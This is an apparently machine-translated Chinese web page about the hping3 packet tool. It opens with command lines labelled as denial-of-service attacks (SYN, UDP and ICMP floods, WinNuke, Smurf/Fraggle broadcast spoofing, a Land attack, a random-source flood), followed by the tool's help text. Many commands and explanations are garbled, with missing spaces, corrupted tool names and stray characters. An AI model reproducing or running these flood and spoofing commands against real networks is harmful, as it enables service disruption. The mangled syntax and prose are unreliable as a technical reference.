Hping百度百科
Hping是命令行中使用的TCP/IP包组装/分析工具,命令模式类似于Unix上的ping命令,但不仅仅可以发送ICMP响应请求,还可以发送TCP、UDP、ICMP和原始IP协议它还具有在两个相互包含的通道之间传输文件的路由跟踪模式。 Hping常用于网络和主机发现,其功能非常强大,可在各种操作系统(如Linux、FreeBSD、NetBSD、OpenBSD、Solaris、MacOs X和Windows )上运行
DOS攻击
1.tcp syn flood攻击
sudo hping 3192.168.200.1-p631-p-- flood
2.Udp流量攻击
sudo hping 3192.168.200.1-p631-s-- flood-2
3.icmp流量攻击
sudo hping 3192.168.200.1-p631-s-- flood-1
4.winnuke攻击
sudo hping3 -U 192.168.200.1 -p 139
注意事项: winnuke攻击端口不仅有139个,还有“138、137、113、53”等端口。
因此,必须小心测试以覆盖所有端口。 重要的是,winnuke攻击的特征是“flag=URG”。
因此,无法将端口检测为特征。
5.smurf攻击
HP3-1- a 192.168.0.1192.168.0.255
一种简单的Smurf攻击原理是通过使用将回复地址设置为受害网络广播地址的ICMP响应请求(ping )分组淹没受害主机。 最终,此网络中的所有主机都会响应此ICMP响应请求,并阻止网络。 它比深度洪水流量高一两个数量级。 更复杂的Smurf将源地址改为第三方受害者,最终第三方崩溃。
第二是复杂点的攻击,冒充攻击的地址向攻击的地址的广播地址,例如:发送信息
# HP3-1- a 192.168.0.1192.168.0.255
Fraggle攻击从smurf的ICMP协议攻击更改为UDP协议攻击,因此仅需要修改一个
个参数即可,所以将“-1”变更为“-2”。 (UTM实现了典型的端口7模式: HP3-2192.168.0.255-D7 ) ) ) ) ) )。
6 .陆地攻击
Sudo HPing3- s-a 192.168.200.1-p 3389 (正在侦听的端口号) 192.168.200.1
注意: Land攻击是指伪装成攻击的地址将请求信息发送到攻击的地址自身
sudo hping3- s-p135flood-v-- rand-source 192.168.1.1http://www.Sina.com/http://www.Sina.com /
usage : hping 3主机[ options ]
- h--帮助显示how this help
- v--版本显示版本
- c--计数包计数
- I--间隔等待(uxforxmicroseconds,for example -i u1000 ) ) ) )。
fastaliasfor-iu 10000 (10包tsforsecond ) )。
fasteraliasfor-I u1000 (100包tsforsecond )。
floodsentpacketsasfastaspossible.don’tshowreplies。
- n--数字数字输出
-q --quiet quiet
- I--接口接口名称(以太网接口路由接口)。
- v-- Verbose Verbose模式
- d--调试调试信息
- z-- bindbindctrlztottl (默认todstport ) )。
-Z --unbind unbind ctrl z
beepbeepforeverymatchingpacketreceived
模式
默认模式TCP
-0- -原始IP原始IP模式
-1--icmp icmp模式
-2--UDP UDP模式
-8- -扫描扫描模式。
example : hping---- scan1- 30,70-90-swww.target.host
-9- -监听器模式
r> IP-a --spoof spoof source address
–rand-dest random destionation address mode. see the man.
–rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don’t fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
–lsrr loose source routing and record route
–ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
–force-icmp send all icmp types (default send only supported types)
–icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
–icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
–icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
–icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+] destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you’ll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
–tcpexitcode use last tcp->th_flags as exit code
–tcp-mss enable the TCP MSS option with the given value
–tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add ‘signature’
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable ‘safe’ protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
–tr-stop Exit when receive the first not ICMP in traceroute mode
–tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
–tr-no-rtt Don’t calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
–apd-send Send the packet described with APD (see docs/APD.txt)